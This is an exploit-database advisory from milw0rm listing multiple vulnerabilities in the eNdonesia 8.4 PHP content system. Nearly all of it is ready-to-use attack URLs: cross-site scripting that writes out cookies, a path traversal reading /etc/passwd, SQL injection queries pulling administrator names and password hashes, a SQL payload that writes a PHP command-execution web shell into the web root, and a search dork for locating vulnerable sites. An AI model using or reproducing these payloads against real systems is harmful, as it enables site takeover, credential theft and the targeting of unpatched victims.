eNdonesia 8.4 - '/mod.php/friend.php/admin.php' Multiple Vulnerabilities

Author: z1ckX(ru)
type: webapps
platform: php
port: 
date_added: 2006-12-24 
date_updated:  
verified: 1 
codes: OSVDB-32482;CVE-2006-6873;OSVDB-32481;OSVDB-32480;CVE-2006-6872;OSVDB-32479;OSVDB-32478;OSVDB-32477;OSVDB-32476;CVE-2006-6871;OSVDB-32475 
tags: 
aliases:  
screenshot_url:  
application_url: 

bugs for Endonesia8.4
FInd:z1ckX(ru)
mail:map-master@mail.ru
1) http://localhost/en/mod.php?mod=[XSS]&op=viewlink&cid=5
2) http://localhost/en/friend.php your Friend:[XSS]
3) http://localhost/en/admin.php Main Text: [XSS]
4) http://localhost/en/mod.php?mod=informasi&op=showinfo&intypeid= ><script>document.write(document.cookie)</script>
5) http://localhost/en/mod.php?mod=../../../../../etc/passwd%00
6) http://localhost/en/mod.php?mod=diskusi&op=viewdisk&did=-4%20union%20select%200,0,name,0,pwd,0,0%20from%20authors/* - LOGIN AND PASS (MD5)
7) http://localhost/en/mod.php?mod=katalog&op=viewlink&cid=-2%20union%20select%200,pwd,0%20from%20authors%20where%20counter=1/*
8) http://localhost/en/mod.php?mod=diskusi&op=viewcat&cid=-2%20union%20select%200,0,0/*

-=====SHELL====-
http://localhost/en/mod.php?mod=diskusi&op=viewdisk&did=-4 %20union%20select%200,0,'<? system($cmd)?>',0,0,0,0%20from%20authors into outfile '/home/localhost/www/en/cmd.php'/*

-======dork=====-
inurl:mod.php?mod=diskusi&op=

# milw0rm.com [2006-12-25]